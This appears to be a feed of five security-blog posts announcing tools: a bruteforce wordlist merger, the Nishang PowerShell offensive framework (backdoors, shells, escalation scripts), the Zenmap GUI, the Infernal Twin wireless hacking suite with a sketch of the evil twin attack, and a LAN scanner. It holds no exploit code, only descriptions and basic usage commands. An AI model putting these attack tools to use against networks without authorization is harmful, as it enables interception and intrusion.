DyMerge is a simple, yet powerful bruteforce dictionary merging tool – written purely in python – which takes given wordlists and merges them into one dynamic dictionary that can then be used as ammunition for a successful dictionary based (or bruteforce) attack.

One day the author was making his way through a ctf challenge, and he thought about how powerful a single dictionary could become if only it contained every possibly relevant wordlist extracted from previous leaked content, provided by everyday cracking tools, and created by custom word list generators. All into one.

DyMerge gives you the opportunity to sit back and relax while your password cracking tool does its job for you, without thinking that you’ll most probably going to have to try using a different dictionary, which – undoubtedly – contains many of the same words as the previous one.

DyMerge deals with that issue for you as it removes duplicates.

Usage

Usage: python dymerge.py {dictionaries} [options]

To view all available options run:

$ python dymerge.py -h

You can download DyMerge here:

git clone https://github.com/k4m4/dymerge.git

Or read more here.

The post DyMerge – Bruteforce Dictionary Merging Tool appeared first on Darknet - The Darkside.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for penetration testing, offensive security and red teaming. Nishang is useful during all phases of penetration testing.

Usage

Import all the scripts in the current PowerShell session (PowerShell v3 onwards).

PS C:\nishang> Import-Module .\nishang.psm1

Use the individual scripts with dot sourcing.

PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

To get help about any script or function, use:

PS C:\nishang> Get-Help [scriptname] -full

Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.

For example, to see the help about Get-WLAN-Keys.ps1, use

PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Scripts

Nishang comes with a myriad of scripts divided into various categories:

• ActiveDirectory
• Backdoors
• Clients
• Escalation
• Execution
• Gathering
• MiTM
• Pivoting
• Scanning
• Powerpreter
• Shells
• Utilities

You can download Nishang here:

nishang-v0.6.7.zip

Or read more here.

The post nishang – PowerShell For Penetration Testing appeared first on Darknet - The Darkside.

Zenmap is the official Nmap GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

No frontend can replace good old command-line Nmap. The nature of a frontend is that it depends on another tool to do its job. Therefore the purpose of Zenmap is not to replace Nmap, but to make Nmap more useful. Here are some of the advantages Zenmap offers over plain Nmap.

Purpose

• Interactive and graphical results viewing – In addition to showing Nmap’s normal output, Zenmap can arrange its display to show all ports on a host or all hosts running a particular service. It summarizes details about a single host or a complete scan in a convenient display. Zenmap can even draw a topology map of discovered networks. The results of several scans may be combined together and viewed at once.
• Comparison – Zenmap has the ability to show the differences between two scans. You can see what changed between the same scan run on different days, between scans of two different hosts, between scans of the same hosts with different options, or any other combination. This allows administrators to easily track new hosts or services appearing on their networks, or existing ones going down.
• Convenience – Zenmap keeps track of your scan results until you choose to throw them away. That means you can run a scan, see the results, and then decide whether to save them to a file. There is no need to think of a file name in advance.
• Repeatability – Zenmap’s command profiles make it easy to run the exact same scan more than once. There’s no need to set up a shell script to do a common scan.
• Discoverability – Nmap has literally hundreds of options, which can be daunting for beginners. Zenmap’s interface is designed to always show the command that will be run, whether it comes from a profile or was built up by choosing options from a menu. This helps beginners learn and understand what they are doing. It also helps experts double-check exactly what will be run before they press “Scan”.

Features

• Frequently used scans can be saved as profiles to make them easy to run repeatedly.
• A command creator allows interactive creation of Nmap command lines.
• Scan results can be saved and viewed later.
• Saved scan results can be compared with one another to see how they differ.
• The results of recent scans are stored in a searchable database.

Zenmap is already included in the Windows and Mac installer and the source, so you can download it using that:

– Windows: nmap-7.31-setup.exe
– Mac OSX: nmap-7.31.dmg
– Source: nmap-7.31.tar.bz2

Or read more here.

The post Zenmap – Official Cross-Platform Nmap GUI appeared first on Darknet - The Darkside.

Infernal Twin is an automated wireless hacking suite written in Python which automates many of the repetitive tasks involved in security testing for wifi networks.

Originally created to automate the Evil Twin attack, it has grown much beyond that into a comprehensive suite including various wireless attack vectors.

An evil twin attack is when a hacker sets its service identifier (SSID) to be the same as an access point at the local hotspot or corporate wireless network. The hacker disrupts or disables the legitimate AP by disconnecting it, directing a denial of service against it, or creating RF interference around it.

Users lose their connections to the legitimate AP and re-connect to the “evil twin,” allowing the hacker to intercept all the traffic to that device.

Features

• WPA2 hacking
• WEP Hacking
• WPA2 Enterprise hacking
• Wireless Social Engineering
• SSL Strip
• Report Generation
  • PDF Report
  • HTML Report
• Note Taking
• Data saved in Database
• Network mapping
• MiTM
• Probe Request

Latest Changes

• Added Log retrieval button for various attack results.
• Added BeeF XSS framework Integration
• Added HTTP Traffic View within tool
• Improved Infenral Wireless Attack
• Visual View of some of the panel improved
• Improved Basic Authentication during Social engineering assessment over wireless network

You can download Infernal Twin here:

infernal-2.6.11.zip

Or read more here.

The post Infernal Twin Updated 2.6.11 – Automated Wireless Hacking Suite appeared first on Darknet - The Darkside.

Advanced IP Scanner is a reliable and free Windows port scanner to analyse members of a LAN. The program shows all network devices, gives you access to shared folders, provides remote control of computers (via RDP and Radmin), and can even remotely switch computers off.

It is easy to use and runs as a portable edition. Advanced IP Scanner has proven itself through the years as a reliable and helpful tool to manage LAN and perform a wide range of networking tasks. Each new version is rigorously tested by Famatech and beta-testers from around the world. The company considers all recommendations on product improvement in order to create the best possible solution for customers.

Features

• Easy access to network shares
• Remote control via RDP and Radmin
• MAC addresses detection
• Switching on/off computers remotely
• Export scan results to CSV
• No installation required
• Windows 10 Compatible

You can download Advanced IP Scanner here:

ipscan24.exe

Or read more here.

The post Advanced IP Scanner – Fast Lightweight Free Windows Port Scanner appeared first on Darknet - The Darkside.